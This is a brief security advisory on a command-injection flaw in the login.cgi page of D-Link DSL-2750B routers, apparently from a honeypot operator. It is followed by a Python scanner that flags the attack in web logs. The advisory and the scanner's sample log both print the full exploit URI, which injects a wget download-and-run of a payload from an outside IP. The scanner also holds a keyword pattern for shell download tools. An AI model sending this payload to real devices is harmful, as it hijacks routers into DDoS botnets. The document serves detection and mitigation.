D-Link Router Vulnerability

Date of Detection:

2018.5.24

Attack Pattern:

  • URI:

          /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$

  • Malware:

The malware is hosted at this IP address: 185.62.190.191.

Target System:

D-Link DSL-2750B

Analysis:

Attackers first exploit vulnerable systems and then control them with malware. Because the affected routers fail to validate user input, remote attackers can take control of them without credentials.

Because no patch from the vendor is available as of now, the attack is being sent widely, and exploits are already published on the Internet. Once a device is under the attackers' control, a variety of malicious code is downloaded with the wget command.

At CloudCoffer's honeypots, the majority of attacks attempt to infect systems with the Satori malware, which is designed to propagate to other systems through the same vulnerability. Infected devices may be commanded to launch devastating distributed denial-of-service (DDoS) attacks on websites, social media platforms, and bank networks.

The best practice for mitigating this type of issue is to restrict Internet users from accessing login.cgi. To secure routers, we generally recommend that users disable remote access, change default login credentials, disable UPnP, and update firmware regularly.
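As an added example that is not part of the original advisory, the following Python scanner flags requests to login.cgi whose cli parameter, after URL decoding, carries shell metacharacters or download commands like the pattern above. The combined-log sample lines, the source addresses and the keyword list are constructed assumptions for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Shell metacharacters and fetch/exec tokens that have no place in a login field (heuristic, assumed list).
SUSPICIOUS = re.compile(r"[;`|&$]|\bwget\b|\bcurl\b|\bsh\b|/tmp/", re.IGNORECASE)

# Constructed sample lines in combined-log style; only the first one carries the injection.
SAMPLE_LOG = """\
203.0.113.5 - - [24/May/2018:10:01:02 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 200 512
203.0.113.6 - - [24/May/2018:10:01:05 +0000] "GET /login.cgi?cli=admin HTTP/1.1" 200 512
203.0.113.7 - - [24/May/2018:10:01:09 +0000] "GET /index.html HTTP/1.1" 200 2048
"""

# Pulls the client address and the request target out of a combined-log line.
REQUEST_RE = re.compile(r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def cli_values(query: str):
    """Yield every decoded cli= value. Split on '&' only: ';' is part of the payload we look for,
    so the query parser's usual ';' separator handling must not swallow it."""
    for pair in query.split("&"):
        if pair.startswith("cli="):
            yield unquote(pair[len("cli="):])


def is_login_cgi_injection(target: str) -> bool:
    """True if the request target is login.cgi with a cli value containing shell metacharacters."""
    parts = urlsplit(target)
    if not parts.path.endswith("/login.cgi"):
        return False
    return any(SUSPICIOUS.search(value) for value in cli_values(parts.query))


def scan_log(text: str) -> list:
    """Return (source_ip, decoded_request_target) for every matching request line."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_login_cgi_injection(m.group("target")):
            hits.append((m.group("src"), unquote(m.group("target"))))
    return hits


if __name__ == "__main__":
    for src, req in scan_log(SAMPLE_LOG):
        print(f"ALERT {src} {req}")
```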